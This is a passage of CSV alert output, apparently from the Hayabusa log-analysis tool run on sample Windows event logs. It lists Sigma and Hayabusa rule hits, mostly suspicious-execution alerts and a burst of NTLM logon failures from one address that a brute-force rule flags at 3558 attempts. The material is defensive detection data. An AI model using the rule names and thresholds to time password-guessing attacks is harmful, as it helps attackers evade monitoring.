.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 
timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: 